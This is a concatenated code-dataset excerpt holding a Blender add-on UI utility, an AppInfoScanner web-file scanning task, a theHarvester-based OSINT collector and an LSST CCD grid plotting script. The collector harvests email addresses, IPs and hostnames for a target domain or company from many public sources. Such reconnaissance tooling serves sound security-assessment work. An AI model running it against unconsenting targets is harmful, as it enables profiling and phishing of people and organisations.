getattr(option.panels[0].data[0], obj.type.lower())[0]\r\n return getattr(panel, F'expand_{re.split(\".*_PT_\", pt.__name__)[1]}')\r\n else:\r\n return True\r\n\r\n\r\ndef header_prop(pt):\r\n if pt.__name__ == 'OBJECT_PT_display_bounds':\r\n return bpy.context.active_object, 'show_bounds'\r\n\r\n elif pt.__name__ == 'DATA_PT_pathanim':\r\n return bpy.context.active_object.data, 'use_path'\r\n\r\n elif pt.__name__ == 'DATA_PT_camera_safe_areas':\r\n return bpy.context.active_object.data, 'show_safe_areas'\r\n\r\n elif pt.__name__ == 'DATA_PT_camera_safe_areas_center_cut':\r\n return bpy.context.active_object.data, 'show_safe_center'\r\n\r\n elif pt.__name__ == 'DATA_PT_camera_background_image':\r\n return bpy.context.active_object.data, 'show_background_images'\r\n\r\n elif pt.__name__ == 'DATA_PT_display_passepartout':\r\n return bpy.context.active_object.data, 'show_passepartout'\r\n\r\n elif pt.__name__ == 'DATA_PT_normals_auto_smooth':\r\n return bpy.context.active_object.data, 'use_auto_smooth'\r\n\r\n elif pt.__name__ == 'DATA_PT_EEVEE_light_distance':\r\n return bpy.context.active_object.data, 'use_custom_distance'\r\n\r\n elif pt.__name__ == 'DATA_PT_EEVEE_shadow':\r\n return bpy.context.active_object.data, 'use_shadow'\r\n\r\n elif pt.__name__ == 'DATA_PT_EEVEE_shadow_contact':\r\n return bpy.context.active_object.data, 'use_contact_shadow'\r\n\r\n elif pt.__name__ == 'DATA_PT_lightprobe_parallax':\r\n return bpy.context.active_object.data, 'use_custom_parallax'\r\n\r\n elif pt.__name__ == 'BONE_PT_deform':\r\n if bpy.context.workspace.tools_mode == 'POSE':\r\n bone = bpy.context.active_object.data.bones[bpy.context.active_pose_bone.name]\r\n else:\r\n bone = bpy.context.active_object.data.bones[bpy.context.active_bone.name]\r\n return bone, 'use_deform'\r\n\r\n return None\r\n\r\n\r\ndef header_presets(pt):\r\n return None\r\n\r\n\r\ndef child_panels(pt, ot):\r\n items = []\r\n for panel in ot.panels[options().context]:\r\n if hasattr(panel, 'bl_parent_id') and panel.bl_parent_id == pt.__name__:\r\n items.append(panel)\r\n\r\n return items\r\n\r\n\r\ndef init_panels(ot):\r\n context = bpy.context\r\n option = options()\r\n\r\n ot.panels = {\r\n 'TOOL': [\r\n special_options.HOPS_PT_specialoptions,\r\n workflow.HOPS_PT_workflow,\r\n sharp_options.HOPS_PT_sharp_options,\r\n mesh_clean_options.HOPS_PT_mesh_clean_options,\r\n mirror_options.HOPS_PT_mirror_options,\r\n operator_options.HOPS_PT_operator_options],\r\n\r\n 'OBJECT': [],\r\n 'CONSTRAINT': [],\r\n 'MODIFIER': [],\r\n 'SHADERFX': [],\r\n 'DATA': [],\r\n # 'BONE': [],\r\n # 'BONE_CONSTRAINT': [],\r\n 'MATERIAL': []}\r\n\r\n obj = context.active_object\r\n if obj:\r\n ot.panels['OBJECT'] = [\r\n properties_object.OBJECT_PT_context_object,\r\n properties_object.OBJECT_PT_transform,\r\n properties_object.OBJECT_PT_delta_transform,\r\n properties_object.OBJECT_PT_relations,\r\n properties_object.OBJECT_PT_display,\r\n properties_object.OBJECT_PT_display_bounds]\r\n\r\n ot.panels['CONSTRAINT'] = [properties_constraint.OBJECT_PT_constraints]\r\n\r\n if obj.type in {'MESH', 'CURVE', 'SURFACE', 'FONT', 'META', 'GPENCIL', 'LATTICE'}:\r\n if obj.type != 'GPENCIL':\r\n ot.panels['MODIFIER'] = [properties_data_modifier.DATA_PT_modifiers]\r\n else:\r\n ot.panels['MODIFIER'] = [properties_data_modifier.DATA_PT_gpencil_modifiers]\r\n ot.panels['SHADERFX'] = [properties_data_shaderfx.DATA_PT_shader_fx]\r\n\r\n if obj.type == 'MESH':\r\n ot.panels['DATA'] = [\r\n properties_data_mesh.DATA_PT_context_mesh,\r\n properties_data_mesh.DATA_PT_vertex_groups,\r\n properties_data_mesh.DATA_PT_shape_keys,\r\n properties_data_mesh.DATA_PT_uv_texture,\r\n properties_data_mesh.DATA_PT_vertex_colors,\r\n properties_data_mesh.DATA_PT_face_maps,\r\n properties_data_mesh.DATA_PT_normals,\r\n properties_data_mesh.DATA_PT_normals_auto_smooth,\r\n properties_data_mesh.DATA_PT_texture_space,\r\n properties_data_mesh.DATA_PT_customdata]\r\n\r\n elif obj.type in {'CURVE', 'SURFACE', 'FONT'}:\r\n ot.panels['DATA'] = [\r\n properties_data_curve.DATA_PT_context_curve,\r\n properties_data_curve.DATA_PT_shape_curve,\r\n properties_data_curve.DATA_PT_geometry_curve,\r\n properties_data_curve.DATA_PT_geometry_curve_bevel,\r\n properties_data_curve.DATA_PT_pathanim,\r\n properties_data_curve.DATA_PT_active_spline,\r\n properties_data_curve.DATA_PT_curve_texture_space]\r\n\r\n if obj.type != 'FONT':\r\n ot.panels['DATA'].append(properties_data_mesh.DATA_PT_shape_keys)\r\n else:\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_font)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_font_transform)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_paragraph)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_paragraph_alignment)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_paragraph_spacing)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_text_boxes)\r\n\r\n\r\n elif obj.type == 'META':\r\n ot.panels['DATA'] = [\r\n properties_data_metaball.DATA_PT_context_metaball,\r\n properties_data_metaball.DATA_PT_metaball,\r\n properties_data_metaball.DATA_PT_metaball_element,\r\n properties_data_metaball.DATA_PT_mball_texture_space]\r\n\r\n elif obj.type == 'GPENCIL':\r\n ot.panels['DATA'] = [\r\n properties_data_gpencil.DATA_PT_gpencil_layers,\r\n properties_data_gpencil.DATA_PT_gpencil_onion_skinning,\r\n properties_data_gpencil.DATA_PT_gpencil_vertex_groups,\r\n properties_data_gpencil.DATA_PT_gpencil_strokes,\r\n properties_data_gpencil.DATA_PT_gpencil_display,\r\n properties_data_gpencil.DATA_PT_gpencil_canvas]\r\n\r\n if context.active_gpencil_layer:\r\n ot.panels['DATA'].extend([\r\n properties_data_gpencil.DATA_PT_gpencil_layer_adjustments,\r\n properties_data_gpencil.DATA_PT_gpencil_layer_relations])\r\n\r\n elif obj.type == 'ARMATURE':\r\n ot.panels['DATA'] = [\r\n properties_data_armature.DATA_PT_context_arm,\r\n properties_data_armature.DATA_PT_skeleton,\r\n properties_data_armature.DATA_PT_display,\r\n properties_data_armature.DATA_PT_bone_groups,\r\n properties_data_armature.DATA_PT_pose_library,\r\n properties_data_armature.DATA_PT_iksolver_itasc]\r\n\r\n ot.panels['BONE'] = [\r\n properties_data_bone.BONE_PT_context_bone,\r\n properties_data_bone.BONE_PT_transform,\r\n properties_data_bone.BONE_PT_curved,\r\n properties_data_bone.BONE_PT_relations,\r\n properties_data_bone.BONE_PT_display,\r\n properties_data_bone.BONE_PT_inverse_kinematics,\r\n properties_data_bone.BONE_PT_deform]\r\n\r\n ot.panels['BONE_CONSTAINT'] = [properties_constraint.BONE_PT_constraints]\r\n\r\n elif obj.type == 'LATTICE':\r\n ot.panels['DATA'] = [\r\n properties_data_lattice.DATA_PT_context_lattice,\r\n properties_data_lattice.DATA_PT_lattice,\r\n properties_data_mesh.DATA_PT_vertex_groups,\r\n properties_data_mesh.DATA_PT_shape_keys]\r\n\r\n elif obj.type == 'EMPTY':\r\n ot.panels['DATA'] = [properties_data_empty.DATA_PT_empty]\r\n\r\n elif obj.type == 'SPEAKER':\r\n ot.panels['DATA'] = [\r\n properties_data_speaker.DATA_PT_context_speaker,\r\n properties_data_speaker.DATA_PT_speaker,\r\n properties_data_speaker.DATA_PT_distance,\r\n properties_data_speaker.DATA_PT_cone]\r\n\r\n elif obj.type == 'CAMERA':\r\n if context.scene.render.engine in {'BLENDER_WORKBENCH', 'BLENDER_EEVEE'}:\r\n ot.panels['DATA'] = [\r\n properties_data_camera.DATA_PT_context_camera,\r\n properties_data_camera.DATA_PT_lens,\r\n properties_data_camera.DATA_PT_camera_dof,\r\n properties_data_camera.DATA_PT_camera_dof_aperture,\r\n properties_data_camera.DATA_PT_camera_stereoscopy,\r\n properties_data_camera.DATA_PT_camera,\r\n properties_data_camera.DATA_PT_camera_safe_areas,\r\n properties_data_camera.DATA_PT_camera_safe_areas_center_cut,\r\n properties_data_camera.DATA_PT_camera_background_image,\r\n properties_data_camera.DATA_PT_camera_display,\r\n properties_data_camera.DATA_PT_camera_display_passepartout]\r\n\r\n else:\r\n from cycles import ui\r\n\r\n ot.panels['DATA'] = [\r\n properties_data_camera.DATA_PT_context_camera,\r\n properties_data_camera.DATA_PT_lens,\r\n ui.CYCLES_CAMERA_PT_camera_dof,\r\n ui.CYCLES_CAMERA_PT_camera_dof_aperture,\r\n ui.CYCLES_CAMERA_PT_camera_dof_viewport,\r\n properties_data_camera.DATA_PT_camera_stereoscopy,\r\n properties_data_camera.DATA_PT_camera,\r\n properties_data_camera.DATA_PT_camera_safe_areas,\r\n properties_data_camera.DATA_PT_camera_background_image,\r\n properties_data_camera.DATA_PT_camera_display,\r\n properties_data_camera.DATA_PT_camera_display_passepartout]\r\n\r\n elif obj.type == 'LIGHT':\r\n if context.scene.render.engine == 'BLENDER_WORKBENCH':\r\n ot.panels['DATA'] = [\r\n properties_data_light.DATA_PT_context_light,\r\n properties_data_light.DATA_PT_preview,\r\n properties_data_light.DATA_PT_light,\r\n properties_data_light.DATA_PT_area]\r\n\r\n\r\n elif context.scene.render.engine == 'BLENDER_EEVEE':\r\n ot.panels['DATA'] = [\r\n properties_data_light.DATA_PT_context_light,\r\n properties_data_light.DATA_PT_preview,\r\n properties_data_light.DATA_PT_EEVEE_light,\r\n properties_data_light.DATA_PT_EEVEE_light_distance,\r\n properties_data_light.DATA_PT_spot,\r\n properties_data_light.DATA_PT_EEVEE_shadow,\r\n properties_data_light.DATA_PT_EEVEE_shadow_contact]\r\n\r\n if bpy.context.active_object.data.type == 'SUN':\r\n ot.panels['DATA'].append(properties_data_light.DATA_PT_EEVEE_shadow_cascaded_shadow_map)\r\n\r\n else:\r\n from cycles import ui\r\n\r\n ot.panels['DATA'] = [\r\n properties_data_light.DATA_PT_context_light,\r\n ui.CYCLES_LIGHT_PT_preview,\r\n ui.CYCLES_LIGHT_PT_light,\r\n ui.CYCLES_LIGHT_PT_nodes,\r\n ui.CYCLES_LIGHT_PT_spot]\r\n\r\n elif obj.type == 'LIGHT_PROBE':\r\n ot.panels['DATA'] = [\r\n properties_data_lightprobe.DATA_PT_context_lightprobe,\r\n properties_data_lightprobe.DATA_PT_lightprobe,\r\n properties_data_lightprobe.DATA_PT_lightprobe_visibility,\r\n properties_data_lightprobe.DATA_PT_lightprobe_parallax,\r\n properties_data_lightprobe.DATA_PT_lightprobe_display]\r\n\r\n if obj.type in {'MESH', 'CURVE', 'SURFACE', 'META', 'FONT', 'GPENCIL'}:\r\n if obj.type != 'GPENCIL':\r\n if context.scene.render.engine == 'BLENDER_WORKBENCH':\r\n ot.panels['MATERIAL'] = [\r\n properties_material.EEVEE_MATERIAL_PT_context_material,\r\n properties_material.MATERIAL_PT_viewport,\r\n cutting_material.HOPS_PT_material_hops]\r\n\r\n elif context.scene.render.engine == 'BLENDER_EEVEE':\r\n ot.panels['MATERIAL'] = [\r\n properties_material.EEVEE_MATERIAL_PT_context_material,\r\n properties_material.MATERIAL_PT_preview,\r\n properties_material.EEVEE_MATERIAL_PT_surface,\r\n properties_material.EEVEE_MATERIAL_PT_volume,\r\n properties_material.MATERIAL_PT_viewport,\r\n properties_material.EEVEE_MATERIAL_PT_settings,\r\n cutting_material.HOPS_PT_material_hops]\r\n\r\n else:\r\n from cycles import ui\r\n\r\n ot.panels['MATERIAL'] = [\r\n ui.CYCLES_PT_context_material,\r\n ui.CYCLES_MATERIAL_PT_preview,\r\n ui.CYCLES_MATERIAL_PT_surface,\r\n ui.CYCLES_MATERIAL_PT_volume,\r\n ui.CYCLES_MATERIAL_PT_displacement,\r\n properties_material.MATERIAL_PT_viewport,\r\n ui.CYCLES_MATERIAL_PT_settings,\r\n ui.CYCLES_MATERIAL_PT_settings_surface,\r\n ui.CYCLES_MATERIAL_PT_settings_volume,\r\n cutting_material.HOPS_PT_material_hops]\r\n else:\r\n ot.panels['MATERIAL'] = [\r\n properties_material_gpencil.MATERIAL_PT_gpencil_slots,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_preview,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_surface,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_strokecolor,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_fillcolor,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_options]\r\n\r\n\r\nclass context_copy:\r\n\r\n\r\n def __init__(self):\r\n copy = bpy.context.copy()\r\n\r\n obj = copy['active_object']\r\n if obj:\r\n copy['object'] = obj\r\n\r\n copy[obj.type.lower()] = obj.data\r\n copy['material'] = obj.active_material\r\n\r\n copy['space_data'] = None\r\n for area in copy['workspace'].screens[0].areas:\r\n if area.type == 'PROPERTIES':\r\n copy['space_data'] = area.spaces[0]\r\n\r\n if len(obj.material_slots):\r\n copy['material_slot'] = obj.material_slots[obj.active_material_index]\r\n else:\r\n copy['material_slot'] = None\r\n\r\n copy['armature'] = obj.data\r\n copy['pose_bone'] = copy['active_pose_bone']\r\n copy['bone'] = obj.data.bones[copy['pose_bone'].name] if copy['workspace'].tools_mode == 'POSE' else None\r\n copy['edit_bone'] = copy['active_bone']\r\n\r\n for key in copy:\r\n setattr(self, key, copy[key])\r\n\r\n\r\n def __new__(self):\r\n self.__init__(self)\r\n\r\n return self\r\n\r\n\r\nclass draw_panel:\r\n\r\n\r\n def __init__(self, ot, pt, layout):\r\n context = context_copy()\r\n self.bl_space_type = 'PROPERTIES'\r\n\r\n if (not hasattr(pt, 'poll') or pt.poll(context)) and not hasattr(pt, 'bl_parent_id'):\r\n if options().context not in {'MODIFIER', 'CONSTRAINT', 'BONE_CONSTAINT', 'SHADERFX'}:\r\n self.layout = layout.box()\r\n else:\r\n self.layout = layout\r\n\r\n self.layout.operator_context = 'INVOKE_DEFAULT'\r\n self.setup_overrides(pt)\r\n\r\n bl_options = getattr(pt, 'bl_options') if hasattr(pt, 'bl_options') else None\r\n if (bl_options and 'HIDE_HEADER' not in bl_options) or not bl_options:\r\n self.header(pt, context, expand(pt), header_prop(pt), header_presets(pt))\r\n\r\n if (bl_options and 'HIDE_HEADER' in bl_options) or expand(pt):\r\n self.panel(pt, context)\r\n\r\n if expand(pt):\r\n for child in child_panels(pt, ot):\r\n if (bl_options and 'HIDE_HEADER' not in bl_options) or not bl_options:\r\n self.layout = layout.box()\r\n self.header(child, context, expand(child), header_prop(child), header_presets(child))\r\n\r\n if (bl_options and 'HIDE_HEADER' in bl_options) or expand(child):\r\n self.panel(child, context)\r\n\r\n\r\n def header(self, pt, context, expand, prop=None, presets=None, emboss=False):\r\n layout = self.layout\r\n\r\n if options().context != 'DATA':\r\n option = getattr(options().panels[0], options().context.lower())[0]\r\n else:\r\n obj = context.active_object\r\n option = getattr(options().panels[0].data[0], obj.type.lower())[0]\r\n\r\n expand_prop = F'expand_{re.split(\".*_PT_\", pt.__name__)[1]}'\r\n\r\n row = layout.row(align=True)\r\n row.alignment = 'LEFT'\r\n row.prop(option, expand_prop, text='', icon=F'DISCLOSURE_TRI_{\"DOWN\" if expand else \"RIGHT\"}', emboss=emboss)\r\n if prop:\r\n row.prop(prop[0], prop[1], text='')\r\n\r\n row.prop(option, expand_prop, toggle=True, text=pt.bl_label, emboss=emboss)\r\n sub = row.row(align=True)\r\n sub.scale_x = 0.70\r\n sub.prop(option, expand_prop, toggle=True, text=' ', emboss=emboss)\r\n\r\n\r\n def panel(self, pt, context):\r\n if options().context not in {'MODIFIER', 'SHADERFX'}:\r\n pt.draw(self, context)\r\n else:\r\n self.draw(self, context)\r\n\r\n\r\n def setup_overrides(self, pt):\r\n global panel_node_draw\r\n\r\n option = options()\r\n obj = bpy.context.active_object\r\n\r\n if bpy.context.scene.render.engine in {'BLENDER_WORKBENCH', 'BLENDER_EEVEE'}:\r\n from bl_ui.properties_material import panel_node_draw\r\n else:\r\n from cycles.ui import panel_node_draw\r\n\r\n if option.context in {'CONSTRAINT', 'BONE_CONSTAINT'}:\r\n panel = properties_constraint.ConstraintButtonsPanel\r\n\r\n def draw_constraint(context, con):\r\n layout = self.layout\r\n\r\n box = layout.template_constraint(con)\r\n\r\n if box:\r\n getattr(panel, con.type)(panel, context, box, con)\r\n\r\n if con.type not in {'RIGID_BODY_JOINT', 'NULL'}:\r\n box.prop(con, 'influence')\r\n\r\n self.draw_constraint = draw_constraint\r\n\r\n elif option.context == 'MODIFIER' and obj.type != 'GPENCIL':\r\n panel = properties_data_modifier.DATA_PT_modifiers\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n ob = context.object\r\n\r\n # layout.operator_menu_enum('object.modifier_add', 'type')\r\n\r\n row = layout.row(align=True)\r\n row.operator_menu_enum(\"object.modifier_add\", \"type\")\r\n row.operator(\"hops.bool_toggle_viewport\", text=\"\", icon=\"HIDE_OFF\")\r\n row.operator(\"hops.open_modifiers\", text=\"\", icon=\"TRIA_DOWN\")\r\n row.operator(\"hops.collapse_modifiers\", text=\"\", icon=\"TRIA_UP\")\r\n\r\n for md in ob.modifiers:\r\n box = layout.template_modifier(md)\r\n if box:\r\n getattr(panel, md.type)(panel, box, ob, md)\r\n\r\n\r\n self.draw = draw\r\n\r\n elif option.context == 'MODIFIER' and obj.type == 'GPENCIL':\r\n panel = properties_data_modifier.DATA_PT_gpencil_modifiers\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n ob = context.object\r\n\r\n layout.operator_menu_enum('object.gpencil_modifier_add', 'type')\r\n\r\n for md in ob.grease_pencil_modifiers:\r\n box = layout.template_greasepencil_modifier(md)\r\n if box:\r\n # match enum type to our functions, avoids a lookup table.\r\n getattr(panel, md.type)(panel, box, ob, md)\r\n\r\n self.draw = draw\r\n\r\n elif option.context == 'SHADERFX':\r\n panel = properties_data_shaderfx.DATA_PT_shader_fx\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n ob = context.object\r\n\r\n layout.operator_menu_enum('object.shaderfx_add', 'type')\r\n\r\n for fx in ob.shader_effects:\r\n box = layout.template_shaderfx(fx)\r\n if box:\r\n # match enum type to our functions, avoids a lookup table.\r\n getattr(panel, fx.type)(panel, box, fx)\r\n\r\n self.draw = draw\r\n\r\n elif option.context == 'DATA' and obj and obj.type == 'GPENCIL':\r\n\r\n def draw_layers(context, layout, gpd):\r\n\r\n row = layout.row()\r\n\r\n col = row.column()\r\n layer_rows = 7\r\n col.template_list('GPENCIL_UL_layer', '', gpd, 'layers', gpd.layers, 'active_index',\r\n rows=layer_rows, sort_reverse=True, sort_lock=True)\r\n\r\n gpl = context.active_gpencil_layer\r\n if gpl:\r\n srow = col.row(align=True)\r\n srow.prop(gpl, 'blend_mode', text='Blend')\r\n\r\n srow = col.row(align=True)\r\n srow.prop(gpl, 'opacity', text='Opacity', slider=True)\r\n srow.prop(gpl, 'clamp_layer', text='',\r\n icon='MOD_MASK' if gpl.clamp_layer else 'LAYER_ACTIVE')\r\n\r\n srow = col.row(align=True)\r\n srow.prop(gpl, 'use_solo_mode', text='Show Only On Keyframed')\r\n\r\n col = row.column()\r\n\r\n sub = col.column(align=True)\r\n sub.operator('gpencil.layer_add', icon='ADD', text='')\r\n sub.operator('gpencil.layer_remove', icon='REMOVE', text='')\r\n\r\n if gpl:\r\n sub.menu('GPENCIL_MT_layer_specials', icon='DOWNARROW_HLT', text='')\r\n\r\n if len(gpd.layers) > 1:\r\n col.separator()\r\n\r\n sub = col.column(align=True)\r\n sub.operator('gpencil.layer_move', icon='TRIA_UP', text='').type = 'UP'\r\n sub.operator('gpencil.layer_move', icon='TRIA_DOWN', text='').type = 'DOWN'\r\n\r\n col.separator()\r\n\r\n sub = col.column(align=True)\r\n sub.operator('gpencil.layer_isolate', icon='LOCKED', text='').affect_visibility = False\r\n sub.operator('gpencil.layer_isolate', icon='RESTRICT_VIEW_ON', text='').affect_visibility = True\r\n\r\n self.draw_layers = draw_layers\r\n\r\n elif option.context == 'MATERIAL':\r\n\r\n if pt.__name__ == 'MATERIAL_PT_viewport':\r\n def draw_shared(self, mat):\r\n layout = self.layout\r\n layout.use_property_split = True\r\n\r\n col = layout.column()\r\n col.prop(mat, 'diffuse_color', text='Color')\r\n col.prop(mat, 'metallic')\r\n col.prop(mat, 'roughness')\r\n\r\n self.draw_shared = draw_shared\r\n\r\n elif pt.__name__ == 'EEVEE_MATERIAL_PT_settings':\r\n def draw_shared(self, mat):\r\n layout = self.layout\r\n layout.use_property_split = True\r\n\r\n layout.prop(mat, \"blend_method\")\r\n\r\n if mat.blend_method != 'OPAQUE':\r\n layout.prop(mat, \"transparent_shadow_method\")\r\n\r\n row = layout.row()\r\n row.active = ((mat.blend_method == 'CLIP') or (mat.transparent_shadow_method == 'CLIP'))\r\n row.prop(mat, \"alpha_threshold\")\r\n\r\n if mat.blend_method not in {'OPAQUE', 'CLIP', 'HASHED'}:\r\n layout.prop(mat, \"show_transparent_back\")\r\n\r\n layout.prop(mat, \"use_screen_refraction\")\r\n layout.prop(mat, \"refraction_depth\")\r\n layout.prop(mat, \"use_sss_translucency\")\r\n layout.prop(mat, \"pass_index\")\r\n\r\n self.draw_shared = draw_shared\r\n","sub_path":"All_In_One/addons/HOps/ui/hops_helper/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":27460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264798776","text":"# -*- coding: utf-8 -*-\n# Author: kelvinBen\n# Github: https://github.com/kelvinBen/AppInfoScanner\n\n\nimport os\nimport re\nimport config\nimport threading\nfrom queue import Queue\nimport libs.core as cores\nfrom libs.core.parses import ParsesThreads\n\n\nclass WebTask(object):\n thread_list =[]\n value_list = []\n result_dict = {}\n\n def __init__(self, input, rules,all,threads):\n self.path = input\n if rules:\n config.filter_strs.append(r'.*'+str(rules)+'.*')\n self.all = all\n self.threads = threads\n self.file_queue = Queue()\n self.shell_falg=False\n\n def start(self):\n # 此处判断是文件还是目录\n # 文件判断后缀 html,js,css,htm,xml等\n \n if len(config.web_file_suffix) <=0:\n scanner_file_suffix = [\"html\",\"js\",\"html\",\"xml\"]\n \n scanner_file_suffix = config.web_file_suffix\n if os.path.isdir(self.path): # 目录的话就提取\n self.__get_scanner_file__(self.path,scanner_file_suffix)\n\n else:\n if not (self.path.split(\".\")[1] in scanner_file_suffix): # 内容包含进行下步处理\n err_info = (\"Retrieval of this file type is not supported. Select a file or directory with a suffix of %s\" % \",\".join(scanner_file_suffix))\n raise Exception(err_info)\n self.file_queue.put(self.path)\n \n self.__start_threads()\n \n for thread in self.thread_list:\n thread.join()\n\n self.__print__()\n\n def __get_scanner_file__(self,scanner_dir,file_suffix):\n dir_or_files = os.listdir(scanner_dir)\n for dir_file in dir_or_files:\n dir_file_path = os.path.join(scanner_dir,dir_file)\n if os.path.isdir(dir_file_path):\n self.__get_scanner_file__(dir_file_path,file_suffix)\n else:\n if len(dir_file.split(\".\"))>1:\n if dir_file.split(\".\")[1] in file_suffix:\n self.file_queue.put(dir_file_path)\n \n def __print__(self):\n print(\"=========The result set for the static scan is shown below:===============\")\n with open(cores.result_path,\"a+\") as f:\n for key,value in self.result_dict.items():\n f.write(key+\"\\r\")\n for result in value:\n if result in self.value_list:\n continue\n self.value_list.append(result)\n print(result)\n f.write(\"\\t\"+result+\"\\r\")\n print(\"For more information about the search, see: %s\" %(cores.result_path))\n\n def __start_threads(self):\n for threadID in range(1,self.threads) : \n name = \"Thread - \" + str(threadID)\n thread = ParsesThreads(threadID,name,self.file_queue,self.all,self.result_dict)\n thread.start()\n self.thread_list.append(thread)","sub_path":"libs/task/web_task.py","file_name":"web_task.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201670362","text":"# -*- coding: utf-8 -*-\n\nfrom salver.facts import IPv4, Email, Domain, Company\nfrom salver.common.utils import get_actual_dir\nfrom salver.common.collectors import DockerCollector\n\n\nclass TheHarester(DockerCollector):\n config = {\n 'name': 'harvester',\n 'docker': {'build_context': get_actual_dir()},\n }\n\n def callbacks(self):\n return {\n Domain: self.from_domain,\n Company: self.from_company,\n }\n\n def from_company(self, company):\n yield from self.scan(company.name)\n\n def from_domain(self, domain):\n yield from self.scan(domain.fqdn)\n\n def scan(self, target):\n data = self.run_container(\n command=[\n '-d',\n target,\n '--source',\n 'baidu,bing,bufferoverun,certspotter,crtsh,dnsdumpster,duckduckgo,\\\n exalead,google,linkedin,linkedin_links,netcraft,\\\n omnisint,otx,qwant,rapiddns,threatminer,twitter,urlscan,yahoo',\n ],\n )\n\n for item, _ in self.findall_regex(\n data,\n r'\\[\\*\\] IPs found: \\d+\\n-------------------\\\n \\n((.|\\n)*)\\n\\[\\*\\] Emails found',\n ):\n for ip in item.split('\\n'):\n if ip:\n yield IPv4(address=ip)\n\n for item, _ in self.findall_regex(\n data,\n r'\\[\\*\\] Emails found: \\d+\\n----------------------\\n((.|\\n)*)\\n\\[\\*\\] Hosts found',\n ):\n for email in item.split('\\n'):\n if email:\n yield Email(address=email)\n\n for item, _ in self.findall_regex(\n data,\n r'\\[\\*\\] Hosts found: \\d+\\n---------------------\\n((.|\\n)*)',\n ):\n for host in item.split('\\n'):\n if not host:\n continue\n if ':' in host:\n domain, ip = host.split(':')\n yield Domain(fqdn=domain, address=ip)\n yield IPv4(address=ip, dns=domain)\n else:\n yield Domain(fqdn=host)\n","sub_path":"salver/agent/collectors/harvester/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"375274402","text":"import argparse\nimport numpy as np\nimport math\nimport pandas\nfrom bokeh.plotting import curdoc, output_file, save, reset_output, figure\nfrom bokeh.layouts import row, column, layout\nfrom bokeh.models import ColumnDataSource, DataTable, TableColumn, NumberFormatter, HTMLTemplateFormatter\n\n\nprint(\"in main\")\n\nparser = argparse.ArgumentParser(\n description='Examine CCD spot images to look at spacing')\n\n# The following are 'convenience options' which could also be specified in\n# the filter string\n\nparser.add_argument('-o', '--output', default='/Users/richard/LSST/Code/misc/CCD_grids/',\n help=\"output directory path\")\nparser.add_argument('--in_params', default='CCD_grids_params.csv',\n help=\"output params file spec\")\nparser.add_argument('-i', '--invert', default='no',\n help=\"invert sensor order\")\nparser.add_argument('-u', '--url_base', default='http://slac.stanford.edu/~richard/LSST/CCD_grids/',\n help=\"base html path\")\n\nargs = parser.parse_args()\n\ncsv_assign = pandas.read_csv(args.in_params, header=0, skipinitialspace=True)\nprint(\"csv read in: \", args.in_params)\ncombos_frame = csv_assign.set_index('name', drop=False)\nid_col = combos_frame[\"name\"]\n\nnames = []\norient = []\nx = [] # for the table\ny = [] # for the table\nsdiff = []\nfx = []\nfy = []\nftheta = []\nst_name = []\n\n# load up the parameters\n\nfor index, c_row in csv_assign.iterrows():\n names.append(c_row[\"name\"])\n orient.append(c_row[\"orientation\"])\n x.append(c_row[\"dx_line\"])\n y.append(c_row[\"dy_line\"])\n sdiff.append(c_row[\"dtheta_line\"])\n st_name.append(c_row[\"ref_CCD\"])\n fx.append(c_row[\"dx_fit\"])\n fy.append(c_row[\"dy_fit\"])\n ftheta.append(c_row[\"dtheta_fit\"])\n\nprint(\"Found \", len(names), \" good filesets\")\n\nTOOLS = \"pan, wheel_zoom, box_zoom, reset, save\"\n\n# now build the sensor/raft grid\n\nfocal_plane = figure(tools=TOOLS, title=\"Focal plane grid\", x_axis_label='pixels',\n y_axis_label='pixels', height=1000, width=1000)\nd_raft = 12700. # pixels - 127 mm between raft centers - per LCA-13381\nd_sensor = 4225. # pixels - 42.25 mm between sensor centers\n\nfor rh in range(0, 5):\n for rv in range(0, 5):\n # suppress the corners\n if (rh == 0 and rv == 0) or (rh == 4 and rv == 0) or (rh == 0 and rv == 4) or (rh == 4 and rv == 4):\n continue\n\n cx_r = (rh-2)*d_raft\n cy_r = (rv-2)*d_raft\n\n focal_plane.rect(x=cx_r, y=cy_r, width=d_raft, height=d_raft, fill_alpha=0.0, line_width=2)\n for sh in range(0, 3):\n for sv in range(0, 3):\n cx_s = cx_r + (sh-1)*d_sensor\n cy_s = cy_r + (sv-1)*d_sensor\n focal_plane.rect(x=cx_s, y=cy_s, width=d_sensor, height=d_sensor, fill_color=\"red\",\n fill_alpha=0.20)\ncx_m = []\ncy_m = []\ndx_m = []\ndy_m = []\n\nfor n in names:\n c_name = n.split(\"_\")\n r0 = c_name[0][-2:]\n s0 = c_name[1][-2:]\n\n cy_0 = -2.5*d_raft + (float(r0[0])+0.5)*d_raft + (float(s0[0]) - 1.)*d_sensor\n cx_0 = -2.5*d_raft + (float(r0[1])+0.5)*d_raft + (float(s0[1]) - 1.)*d_sensor\n\n r1 = c_name[2][-2:]\n s1 = c_name[3][-2:]\n cy_1 = -2.5*d_raft + (float(r1[0])+0.5)*d_raft + (float(s1[0]) - 1.)*d_sensor\n cx_1 = -2.5*d_raft + (float(r1[1])+0.5)*d_raft + (float(s1[1]) - 1.)*d_sensor\n\n focal_plane.line([cx_0, cx_1], [cy_0, cy_1], line_color=\"black\", line_width=8)\n\nfocal_plane.circle(x=0., y=0., color=\"green\", size=8)\n\nsensors = [\"R30_S10\", \"R30_S00\", \"R20_S20\", \"R20_S10\", \"R20_S00\", \"R20_S01\", 